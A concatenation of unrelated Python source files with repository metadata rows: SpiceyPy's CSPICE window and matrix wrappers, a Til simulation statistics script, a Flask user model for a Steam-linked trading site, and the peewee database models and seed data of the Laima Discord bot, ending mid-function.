    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncard_c.html
    :param window: Input window
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: the cardinality of the input window.
    :rtype: int
    """
    assert isinstance(window, stypes.SpiceCell)
    # SpiceCell instances are passed by value; CSPICE only reads from it here.
    cardinality = libspice.wncard_c(window)
    return cardinality
@spiceErrorCheck
def wncomd(left, right, window):
    """
    Determine the complement of a double precision window with
    respect to the interval [left, right].
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncomd_c.html
    :param left: left endpoints of complement interval.
    :type left: float
    :param right: right endpoints of complement interval.
    :type right: float
    :param window: Input window
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Complement of window with respect to left and right.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    lo = ctypes.c_double(left)
    hi = ctypes.c_double(right)
    # The complement never needs more room than the input window provides.
    complement = stypes.SpiceCell.double(window.size)
    libspice.wncomd_c(lo, hi, ctypes.byref(window), complement)
    return complement
@spiceErrorCheck
def wncond(left, right, window):
    """
    Contract each interval of a double precision window in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wncond_c.html
    :param left: Amount added to each left endpoint.
    :type left: float
    :param right: Amount subtracted from each right endpoint.
    :type right: float
    :param window: Window to be contracted
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Contracted Window.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    delta_left = ctypes.c_double(left)
    delta_right = ctypes.c_double(right)
    # Mutates the caller's window; also returned for convenience.
    libspice.wncond_c(delta_left, delta_right, ctypes.byref(window))
    return window
@spiceErrorCheck
def wndifd(a, b):
    """
    Compute the difference of two double precision windows and place it
    into a third window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wndifd_c.html
    :param a: Input window A.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Input window B.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Difference of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == 1
    assert b.dtype == 1
    # The difference can never exceed the combined capacity of both inputs.
    out = stypes.SpiceCell.double(a.size + b.size)
    libspice.wndifd_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(out))
    return out
@spiceErrorCheck
def wnelmd(point, window):
    """
    Test whether a point is contained in a double precision window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnelmd_c.html
    :param point: Input point.
    :type point: float
    :param window: Input window
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: returns True if point is an element of window.
    :rtype: bool
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    pt = ctypes.c_double(point)
    # Coerce the C SpiceBoolean return into a Python bool.
    return bool(libspice.wnelmd_c(pt, ctypes.byref(window)))
@spiceErrorCheck
def wnexpd(left, right, window):
    """
    Expand each interval of a double precision window in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnexpd_c.html
    :param left: Amount subtracted from each left endpoint.
    :type left: float
    :param right: Amount added to each right endpoint.
    :type right: float
    :param window: Window to be expanded.
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Expanded Window.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    delta_left = ctypes.c_double(left)
    delta_right = ctypes.c_double(right)
    # Mutates the caller's window; also returned for convenience.
    libspice.wnexpd_c(delta_left, delta_right, ctypes.byref(window))
    return window
@spiceErrorCheck
def wnextd(side, window):
    """
    Extract either the left or the right endpoints from a double
    precision window, in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnextd_c.html
    :param side: Extract left "L" or right "R" endpoints.
    :type side: str
    :param window: Window to be extracted.
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Extracted Window.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    assert side in ('L', 'R')
    # CSPICE takes the selector as a single C char.
    side_char = ctypes.c_char(side.encode(encoding='UTF-8'))
    libspice.wnextd_c(side_char, ctypes.byref(window))
    return window
@spiceErrorCheck
def wnfetd(window, n):
    """
    Fetch the endpoints of a particular interval of a double precision
    window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfetd_c.html
    :param window: Input window
    :type window: spiceypy.utils.support_types.SpiceCell
    :param n: Index of interval to be fetched.
    :type n: int
    :return: Left, right endpoints of the nth interval.
    :rtype: tuple
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    index = ctypes.c_int(n)
    # The endpoints come back through two output pointers.
    interval_begin = ctypes.c_double()
    interval_end = ctypes.c_double()
    libspice.wnfetd_c(ctypes.byref(window), index,
                      ctypes.byref(interval_begin),
                      ctypes.byref(interval_end))
    return interval_begin.value, interval_end.value
@spiceErrorCheck
def wnfild(small, window):
    """
    Fill small gaps between adjacent intervals of a double precision
    window, in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfild_c.html
    :param small: Limiting measure of small gaps.
    :type small: float
    :param window: Window to be filled
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Filled Window.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    gap_limit = ctypes.c_double(small)
    # Mutates the caller's window; also returned for convenience.
    libspice.wnfild_c(gap_limit, ctypes.byref(window))
    return window
@spiceErrorCheck
def wnfltd(small, window):
    """
    Filter (remove) small intervals from a double precision window,
    in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnfltd_c.html
    :param small: Limiting measure of small intervals.
    :type small: float
    :param window: Window to be filtered.
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Filtered Window.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    size_limit = ctypes.c_double(small)
    # Mutates the caller's window; also returned for convenience.
    libspice.wnfltd_c(size_limit, ctypes.byref(window))
    return window
@spiceErrorCheck
def wnincd(left, right, window):
    """
    Test whether the interval [left, right] is included in a double
    precision window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnincd_c.html
    :param left: Left interval
    :type left: float
    :param right: Right interval
    :type right: float
    :param window: Input window
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: Returns True if the input interval is included in window.
    :rtype: bool
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    lo = ctypes.c_double(left)
    hi = ctypes.c_double(right)
    # Coerce the C SpiceBoolean return into a Python bool.
    return bool(libspice.wnincd_c(lo, hi, ctypes.byref(window)))
@spiceErrorCheck
def wninsd(left, right, window):
    """
    Insert the interval [left, right] into a double precision window,
    in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wninsd_c.html
    :param left: Left endpoints of new interval.
    :type left: float
    :param right: Right endpoints of new interval.
    :type right: float
    :param window: Input window.
    :type window: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    lo = ctypes.c_double(left)
    hi = ctypes.c_double(right)
    # Mutates the caller's window; nothing is returned.
    libspice.wninsd_c(lo, hi, ctypes.byref(window))
@spiceErrorCheck
def wnintd(a, b):
    """
    Place the intersection of two double precision windows into
    a third window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnintd_c.html
    :param a: Input window A.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Input window B.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Intersection of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Check types before touching .dtype so that a non-SpiceCell argument
    # fails with an AssertionError rather than an AttributeError
    # (same check order as wndifd).
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == 1
    assert b.dtype == 1
    # The intersection can never exceed the combined capacity of both inputs.
    c = stypes.SpiceCell.double(a.size + b.size)
    libspice.wnintd_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
def wnreld(a, op, b):
    """
    Compare two double precision windows.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnreld_c.html
    :param a: First window.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param op: Comparison operator.
    :type op: str
    :param b: Second window.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: The result of comparison: a (op) b.
    :rtype: bool
    """
    # Check types before touching .dtype so that a non-SpiceCell argument
    # fails with an AssertionError rather than an AttributeError
    # (same check order as wndifd).
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == 1
    assert b.dtype == 1
    assert isinstance(op, str)
    op = stypes.stringToCharP(op.encode(encoding='UTF-8'))
    return bool(libspice.wnreld_c(ctypes.byref(a), op, ctypes.byref(b)))
@spiceErrorCheck
def wnsumd(window):
    """
    Summarize the contents of a double precision window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnsumd_c.html
    :param window: Window to be summarized.
    :type window: spiceypy.utils.support_types.SpiceCell
    :return:
        Total measure of intervals in window,
        Average measure, Standard deviation,
        Location of shortest interval,
        Location of longest interval.
    :rtype: tuple
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    # All five summary values come back through output pointers.
    total = ctypes.c_double()
    mean = ctypes.c_double()
    deviation = ctypes.c_double()
    idx_shortest = ctypes.c_int()
    idx_longest = ctypes.c_int()
    libspice.wnsumd_c(ctypes.byref(window), ctypes.byref(total),
                      ctypes.byref(mean), ctypes.byref(deviation),
                      ctypes.byref(idx_shortest), ctypes.byref(idx_longest))
    return (total.value, mean.value, deviation.value,
            idx_shortest.value, idx_longest.value)
@spiceErrorCheck
def wnunid(a, b):
    """
    Place the union of two double precision windows into a third window.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnunid_c.html
    :param a: Input window A.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Input window B.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Union of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Check types before touching .dtype so that a non-SpiceCell argument
    # fails with an AssertionError rather than an AttributeError
    # (same check order as wndifd).
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == 1
    assert b.dtype == 1
    # The union needs at most the combined capacity of both inputs.
    c = stypes.SpiceCell.double(a.size + b.size)
    libspice.wnunid_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
def wnvald(insize, n, window):
    """
    Form a valid double precision window from the contents
    of a window array, in place.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/wnvald_c.html
    :param insize: Size of window.
    :type insize: int
    :param n: Original number of endpoints.
    :type n: int
    :param window: Input window.
    :type window: spiceypy.utils.support_types.SpiceCell
    :return: The union of the intervals in the input cell.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(window, stypes.SpiceCell)
    assert window.dtype == 1
    size_c = ctypes.c_int(insize)
    count_c = ctypes.c_int(n)
    # Mutates the caller's window; also returned for convenience.
    libspice.wnvald_c(size_c, count_c, ctypes.byref(window))
    return window
@spiceErrorCheck
def writln(line, unit):
    """
    Internal undocumented command for writing a text line to a logical unit
    No URL available; relevant lines from SPICE source:
    FORTRAN SPICE, writln.f::
        C$Procedure      WRITLN ( Write a text line to a logical unit )
        SUBROUTINE WRITLN ( LINE, UNIT )
        CHARACTER*(*)      LINE
        INTEGER            UNIT
        C     VARIABLE  I/O  DESCRIPTION
        C     --------  ---  --------------------------------------------------
        C     LINE       I   The line which is to be written to UNIT.
        C     UNIT       I   The Fortran unit number to use for output.
    CSPICE, writln.c::
        /* $Procedure      WRITLN ( Write a text line to a logical unit ) */
        /* Subroutine */ int writln_(char *line, integer *unit, ftnlen line_len)
    :param line: The line which is to be written to UNIT.
    :type line: str
    :param unit: The Fortran unit number to use for output.
    :type unit: int
    """
    # Calls the f2c-translated Fortran entry point directly, so the hidden
    # string-length argument (ftnlen) must be supplied explicitly.
    line_p = stypes.stringToCharP(line)
    unit_c = ctypes.c_int(unit)
    length = ctypes.c_int(len(line))
    libspice.writln_(line_p, ctypes.byref(unit_c), length)
################################################################################
# X
@spiceErrorCheck
def xf2eul(xform, axisa, axisb, axisc):
    """
    Convert a state transformation matrix to Euler angles and their
    derivatives with respect to a specified set of axes.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xf2eul_c.html
    :param xform: state transformation matrix
    :type xform: list[6][6]
    :param axisa: Axis A of the Euler angle factorization.
    :type axisa: int
    :param axisb: Axis B of the Euler angle factorization.
    :type axisb: int
    :param axisc: Axis C of the Euler angle factorization.
    :type axisc: int
    :return: (eulang, unique)
    :rtype: tuple
    """
    mat = stypes.toDoubleMatrix(xform)
    ax_a = ctypes.c_int(axisa)
    ax_b = ctypes.c_int(axisb)
    ax_c = ctypes.c_int(axisc)
    # Six outputs: three angles followed by their three derivatives.
    angles = stypes.emptyDoubleVector(6)
    unique = ctypes.c_int()
    libspice.xf2eul_c(mat, ax_a, ax_b, ax_c, angles, unique)
    return stypes.cVectorToPython(angles), unique.value
@spiceErrorCheck
def xf2rav(xform):
    """
    Determine the rotation matrix and angular velocity of the rotation
    from a state transformation matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xf2rav_c.html
    :param xform: state transformation matrix
    :type xform: list[6][6]
    :return:
            rotation associated with xform,
            angular velocity associated with xform.
    :rtype: tuple
    """
    mat = stypes.toDoubleMatrix(xform)
    # Output buffers: a 3x3 rotation and a 3-vector angular velocity.
    rotation = stypes.emptyDoubleMatrix()
    angular_velocity = stypes.emptyDoubleVector(3)
    libspice.xf2rav_c(mat, rotation, angular_velocity)
    return (stypes.cMatrixToNumpy(rotation),
            stypes.cVectorToPython(angular_velocity))
@spiceErrorCheck
def xfmsta(input_state, input_coord_sys, output_coord_sys, body):
    """
    Transform a state between coordinate systems.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xfmsta_c.html
    :param input_state: Input state.
    :type input_state: 6-Element Array of floats
    :param input_coord_sys: Current (input) coordinate system.
    :type input_coord_sys: str
    :param output_coord_sys: Desired (output) coordinate system.
    :type output_coord_sys: str
    :param body:
            Name or NAIF ID of body with which coordinates
            are associated (if applicable).
    :type body: str
    :return: Converted output state
    :rtype: 6-Element Array of floats
    """
    state_in = stypes.toDoubleVector(input_state)
    sys_in = stypes.stringToCharP(input_coord_sys)
    sys_out = stypes.stringToCharP(output_coord_sys)
    body_p = stypes.stringToCharP(body)
    # Output buffer for the transformed 6-element state.
    state_out = stypes.emptyDoubleVector(6)
    libspice.xfmsta_c(state_in, sys_in, sys_out, body_p, state_out)
    return stypes.cVectorToPython(state_out)
@spiceErrorCheck
def xpose(m):
    """
    Transpose a 3x3 matrix
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xpose_c.html
    :param m: Matrix to be transposed
    :type m: 3x3-Element Array of floats
    :return: Transposed matrix
    :rtype: 3x3-Element Array of floats
    """
    mat = stypes.toDoubleMatrix(m)
    # CSPICE writes the transpose into a caller-supplied 3x3 buffer.
    transposed = stypes.emptyDoubleMatrix(x=3, y=3)
    libspice.xpose_c(mat, transposed)
    return stypes.cMatrixToNumpy(transposed)
@spiceErrorCheck
def xpose6(m):
    """
    Transpose a 6x6 matrix
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xpose6_c.html
    :param m: Matrix to be transposed
    :type m: list[6][6]
    :return: Transposed matrix
    :rtype: list[6][6]
    """
    mat = stypes.toDoubleMatrix(m)
    # CSPICE writes the transpose into a caller-supplied 6x6 buffer.
    transposed = stypes.emptyDoubleMatrix(x=6, y=6)
    libspice.xpose6_c(mat, transposed)
    return stypes.cMatrixToNumpy(transposed)
@spiceErrorCheck
def xposeg(matrix, nrow, ncol):
    """
    Transpose a matrix of arbitrary size
    in place, the matrix need not be square.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xposeg_c.html
    :param matrix: Matrix to be transposed
    :type matrix: NxM-Element Array of floats
    :param nrow: Number of rows of input matrix.
    :type nrow: int
    :param ncol: Number of columns of input matrix
    :type ncol: int
    :return: Transposed matrix
    :rtype: NxM-Element Array of floats
    """
    mat = stypes.toDoubleMatrix(matrix)
    # Allocate the output with the Python ints before wrapping them in
    # ctypes values; the transpose has ncol rows and nrow columns.
    transposed = stypes.emptyDoubleMatrix(x=ncol, y=nrow)
    cols = ctypes.c_int(ncol)
    rows = ctypes.c_int(nrow)
    libspice.xposeg_c(mat, rows, cols, transposed)
    return stypes.cMatrixToNumpy(transposed)
| mit | -6,712,519,455,095,810,000 | 31.357298 | 229 | 0.674344 | false | 3.19477 | false | false | false |
AlexisEidelman/Til | til/pgm/output/statistics.py | 2 | 2570 | '''
Created on 29 Apr 2013
@author: alexis_e
'''
from pandas import HDFStore, merge # DataFrame
import numpy as np
import pdb
import time
from utils import til_name_to_of
temps = time.clock()
simul = "C:/til/output/simul.h5"
# output = HDFStore(calc)
simul = HDFStore(simul)
nom = 'register'
base = 'entities/'+nom
register = simul[str(base)]
indiv = register['id'].unique()
reg_ind = register.groupby('id')
naiss = reg_ind.max()['naiss']
deces = reg_ind.max()['deces']
duree_vie = (deces>0) * (deces - naiss)
duree_vie_freq = duree_vie.value_counts()
print duree_vie_freq
pdb.set_trace()
table = {}
nom = 'person'
base = 'entities/'+nom
ent = til_name_to_of[nom]
table[ent] = simul[str(base)]
table[ent] = table[ent].rename(columns={'men': 'idmen', 'foy': 'idfoy', 'id': 'noi'})
# liste des donnees temporaire que l on peut supprimer
# anc, expr, education_level, nb_children_ind, dur_separated, dur_in_couple, agegroup_civilstate, agegroup_work
# quifoy, idfoy, quimen, idmen, wpr;_init
# get years
years = np.unique(table[ent]['period'].values)
# get individuals
ids = np.unique(table[ent]['noi'].values)
#typemap = {bool: int, int: int, float: float}
#res_type = typemap[dtype(expr, context)]
res_size = len(ids)
#
#sum_values = np.zeros((res_size,4), dtype=float)
#for ind in ids:
# x = table[ent][table[ent]['noi']==ind][['sali','rsti','choi']].sum().values
# sum_values[ind,1:] = x
# sum_values[ind,0] = ind
list2drop = ['wprm_init','age','idmen','idfoy','quifoy', 'pere','mere','conj','dur_in_couple','dur_out_couple',
'education_level','productivity','xpr','anc']
list2keep = ['sexe','noi','findet','civilstate','workstate','sali','rsti','choi']
#tab = table[ent].drop(list2drop, axis=1)
tab = table['ind'][list2keep]
indiv = tab.groupby(['noi'],sort=False)
cumul = indiv.sum()
nb_obs = indiv.size()
moyenne = cumul.div(nb_obs,axis=0)
# nombre d'annee dans chaque etat.
workstate = tab.groupby(['noi','workstate'],sort=False).size()
civilstate = tab.groupby(['noi','civilstate'],sort=False).size()
passage = table['ind'][['noi','period','idmen','idfoy','quifoy','quimen']]
## donnee menage
tabm = output['men']
tabm = merge(passage, tabm , how='right', on=['period','idmen'], sort=False)
tabm[['ndvdisp','ndvini','ndvnet']] = tabm[['revdisp','revini','revnet']].div(tabm['uc'],axis=0)
menag = tabm.groupby(['noi'],sort=False)
cumul = menag.sum()
nb_obs = menag.size()
moyenne = cumul.div(nb_obs,axis=0)
decile = tabm.groupby(['noi','decile'],sort=False).size()
pdb.set_trace()
simul.close()
output.close()
| gpl-3.0 | 8,974,987,625,415,200,000 | 27.241758 | 111 | 0.659533 | false | 2.562313 | false | false | false |
Arcana/emoticharms.trade | app/users/models.py | 1 | 3953 | from app import db, steam
from steam.api import HTTPError, HTTPTimeoutError
from flask.ext.login import AnonymousUserMixin
import datetime
from app.emoticharms.models import UserPack
class AnonymousUser(AnonymousUserMixin):
user_class = 0
@staticmethod
def update_steam():
return False
@staticmethod
def is_admin():
return False
@staticmethod
def is_uploader():
return False
class User(db.Model):
__tablename__ = "users"
account_id = db.Column(db.Integer, primary_key=True, autoincrement=False)
name = db.Column(db.String(256, collation="utf8_swedish_ci"), default=account_id)
profile_url = db.Column(db.String(128))
avatar_small = db.Column(db.String(128))
avatar_medium = db.Column(db.String(128))
avatar_large = db.Column(db.String(128))
joined = db.Column(db.DateTime, default=datetime.datetime.utcnow, nullable=False)
last_seen = db.Column(db.DateTime, default=datetime.datetime.utcnow, nullable=False)
next_steam_check = db.Column(db.DateTime, default=datetime.datetime.utcnow() + datetime.timedelta(hours=4))
user_class = db.Column(db.Integer, default=0)
signed_in = db.Column(db.Boolean, default=True)
ti5_ticket = db.Column(db.Boolean, default=False)
enabled = db.Column(db.Boolean, default=True)
email = db.Column(db.String(256, collation="utf8_swedish_ci"))
__mapper_args__ = {
"order_by": [db.asc(joined)]
}
def __init__(self, account_id=None, signed_in=None, last_seen=None):
self.account_id = account_id
self.signed_in = signed_in
self.last_seen = last_seen
self.fetch_steam_info()
def __repr__(self):
return self.name
def get_id(self):
return unicode(self.account_id)
def is_active(self):
return self.enabled
@staticmethod
def is_anonymous():
return False
@staticmethod
def is_authenticated():
return True
def is_admin(self):
return True if self.user_class > 1 else False
def update_last_seen(self):
now = datetime.datetime.utcnow()
if not self.next_steam_check:
self.next_steam_check = datetime.datetime.utcnow()
self.last_seen = now
if self.next_steam_check < now:
self.fetch_steam_info()
db.session.add(self)
db.session.commit()
def fetch_steam_info(self):
steam_info = steam.user.profile(self.steam_id)
self.update_steam_info(steam_info)
def update_steam_info(self, steam_info):
try:
self.name = steam_info.persona
self.profile_url = steam_info.profile_url
self.avatar_small = steam_info.avatar_small
self.avatar_medium = steam_info.avatar_medium
self.avatar_large = steam_info.avatar_large
self.ti5_ticket = self.check_ti5_ticket_status() if not self.ti5_ticket else self.ti5_ticket
self.next_steam_check = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
except (HTTPError, HTTPTimeoutError):
self.next_steam_check = datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
def check_ti5_ticket_status(self): # This API call is secured, so don't try it!
status = steam.api.interface("IDOTA2Ticket_570").SteamAccountValidForEvent(EventID=1, SteamID=self.steam_id)\
.get("result")
return status.get("valid")
@property
def steam_id(self):
return self.account_id + 76561197960265728
@property
def perma_profile_url(self):
return "http://steamcommunity.com/profiles/{}".format(self.steam_id)
@property
def spare_packs(self):
return UserPack.query.filter(UserPack.user_id == self.account_id, UserPack.quantity > 1).all()
@property
def wanted_packs(self):
return UserPack.query.filter(UserPack.user_id == self.account_id, UserPack.quantity == 0).all()
| gpl-2.0 | 4,285,753,455,298,286,000 | 33.077586 | 117 | 0.653428 | false | 3.485891 | false | false | false |
glouis/Laima-Discord-Bot | laima/model.py | 1 | 12691 | """
This file is part of Laima Discord Bot.
Copyright 2017 glouis
Laima Discord Bot is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Laima Discord Bot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Laima Discord Bot. If not, see <http://www.gnu.org/licenses/>.
"""
import enum
import json
import os
from peewee import *
import re
import unidecode
laima_db = SqliteDatabase("laima.db")
languages = [("EN", 1), ("FR", 2), ("ES", 3)]
class PackColour(enum.Enum):
BRONZE = 3
SILVER = 2
GOLD = 1
NECRO = 4
OROPO = 5
class Trophy(enum.Enum):
FIRST = 1
SECOND = 2
THIRD = 3
TOP20 = 20
TOP100 = 100
VETERAN = 30
class CardType(enum.Enum):
CREATURE = 0
SPELL = 1
OBJECT = 2
class Extension(enum.Enum):
BASE = 1
OROPO = 281
NECRO = 518
class Family(enum.Enum):
NONE = 0
IOP = 1
CRA = 2
ENIRIPSA = 3
ENUTROF = 4
SRAM = 5
SACRIER = 6
FECA = 7
ECAFLIP = 8
XELOR = 9
OSAMODAS = 10
MULTIMAN = 11
ARACHNEE = 12
TOFU = 13
GOBBALL = 14
BOOWOLF = 15
LARVA = 16
TREECHNID = 17
WABBITS = 18
RAT = 19
DRHELLER = 20
VAMPIRE = 21
CRACKLER = 22
SCARALEAF = 23
PIWI = 24
BLIBLI = 25
STRICH = 26
MONK = 27
CHAFER = 28
CAWWOT = 29
JELLY = 30
WHISPERER = 31
SADIDA = 32
BROTHERHOOD_OF_THE_TOFU = 33
UNKNOW = 34
HUPPERMAGE = 35
BOW_MEOW = 36
RIKTUS = 37
KOKOKO = 38
MOOGRR = 39
SNAPPER = 40
SCHNEK = 41
CROBAK = 42
DOLL = 43
OUGINAK = 44
MASQUERAIDER = 45
ROGUE = 46
BANDIT = 47
BELLAPHONE = 48
MUSHD = 49
BWORK = 50
PIG = 51
CASTUC = 52
TOAD = 53
KWISMAS_CREATURE = 54
DRAGON = 55
ELIATROPE = 56
SCARECROW = 57
PUDDLY = 58
GRAMBO = 59
VIGILANTE = 60
KRALOVE = 61
MOSKITO = 62
PRINCESS = 63
PRESPIC = 64
PLANT = 65
POLTER = 66
FLEA = 67
SHARK = 68
ALBATROCIOUS = 69
SHUSHU = 70
FOGGERNAUT = 71
TAUR = 72
TROOL = 73
MIDGINS = 74
LOOT = 75
CHEST = 76
PALADIR = 77
NECRO = 78
TRAP = 79
SNOOFLE = 80
DRHELLZERKER = 81
GHOUL = 82
BROTHERHOOD_OF_THE_FORGOTTEN = 83
PANDAWA = 84
ELIOTROPE = 85
FAN = 86
class God(enum.Enum):
NEUTRAL = 0
IOP = 1
CRA = 2
ENIRIPSA = 3
ECAFLIP = 4
ENUTROF = 5
SRAM = 6
XELOR = 7
SACRIER = 8
FECA = 9
SADIDA = 10
RUSHU = 17
class Rarity(enum.Enum):
COMMON = 0
UNCOMMON = 1
RARE = 2
KROSMIC = 3
INFINITE = 4
class BaseModel(Model):
class Meta:
database = laima_db
class Draft(BaseModel):
victories_number = IntegerField(unique=True)
level = IntegerField()
pack = IntegerField()
kamas = CharField()
chips = CharField()
earnings = CharField()
class Meta:
order_by = ('victories_number',)
class Server(BaseModel):
id = CharField(unique=True)
lang = IntegerField(default=1)
prefix = CharField(default="&")
class Meta:
order_by = ('id',)
class Channel(BaseModel):
id = CharField(unique=True)
lang = IntegerField(default=None, null=True)
twitter = BooleanField(default=False)
rss = BooleanField(default=False)
server = ForeignKeyField(Server, related_name='channels')
class Meta:
order_by = ('id',)
class Rank(BaseModel):
number = CharField(unique=True)
common = IntegerField(default = 0)
uncommon = IntegerField(default = 0)
rare = IntegerField(default = 0)
krosmic = IntegerField(default = 0)
infinite = IntegerField(default = 0)
kamas = IntegerField()
pedestal = BooleanField(default = True)
trophy = IntegerField(default = None, null=True)
class Meta:
order_by = ('number',)
class CardData(BaseModel):
card_id = CharField(unique=True)
card_type = IntegerField()
ap_cost = IntegerField()
life = IntegerField()
attack = IntegerField()
movement_point = IntegerField()
extension = IntegerField()
families = CharField(default="0")
god = IntegerField(default=0)
rarity = IntegerField()
infinite_level = IntegerField(null=True, default=None)
is_token = BooleanField(default=False)
class Meta:
order_by = ('card_id',)
class CardText(BaseModel):
card_data = ForeignKeyField(CardData, related_name='texts')
name = CharField()
description = TextField()
lang = IntegerField()
class Meta:
order_by = ('name',)
class Tag(BaseModel):
name = CharField(unique=True)
class Meta:
order_by = ('name',)
class CardTextTag(BaseModel):
cardtext = ForeignKeyField(CardText, related_name='tags')
tag = ForeignKeyField(Tag, related_name='cardtexts')
class RssFeeder(BaseModel):
lang = IntegerField(unique=True)
last_entry_id = CharField(default=None)
class TwitterFeeder(BaseModel):
lang = IntegerField(unique=True)
last_tweet_id = CharField(default=None)
def create_tables():
laima_db.connect()
laima_db.create_tables([CardData, CardText, CardTextTag, Channel, Draft, Rank, RssFeeder, Server, Tag, TwitterFeeder])
laima_db.close()
def init_draft():
for i in range(13):
if i < 7:
pack = PackColour.BRONZE.value
if i == 0:
level = 1
kamas = "15-25"
chips = "0"
earnings = "15-25"
elif i < 4:
level = 2
kamas = "25-35"
if i == 1:
chips = "50"
earnings = "30-40"
if i == 2:
chips = "100-150"
earnings = "35-50"
if i == 3:
chips = "150-250"
earnings = "40-60"
else:
level = 3
kamas = "35-45"
if i == 4:
chips = "250-350"
earnings = "60-80"
if i == 5:
chips = "350-600"
earnings = "70-105"
if i == 6:
chips = "450-850"
earnings = "80-130"
else:
level = 4
if i < 10:
pack = PackColour.SILVER.value
kamas = "50-60"
if i == 7:
chips = "700-1100"
earnings = "120-170"
if i == 8:
chips = "950-1700"
earnings = "145-230"
if i == 9:
chips = "1200-2300"
earnings = "170-290"
else:
pack = PackColour.GOLD.value
kamas = "200"
if i == 10:
chips = "1800-2900"
earnings = "380-490"
if i == 11:
chips = "2400-2950"
earnings = "440-495"
if i == 12:
chips = "3000"
earnings = "500"
with laima_db.transaction():
Draft.create(victories_number=i,
level=level,
pack=pack,
kamas=kamas,
chips=chips,
earnings=earnings)
def init_rank():
    """Fill the Rank table: numbered ladder ranks 6-30 plus the special
    end-of-season podium ranks.
    """
    for rank in range(6, 31):
        # Card-rarity rewards and kamas scale with the rank reached.
        fields = {"number": str(rank)}
        if rank < 18:
            fields["kamas"] = (rank - 3) * 5
            if rank < 11:
                fields.update(common=2, uncommon=1)
            elif rank < 16:
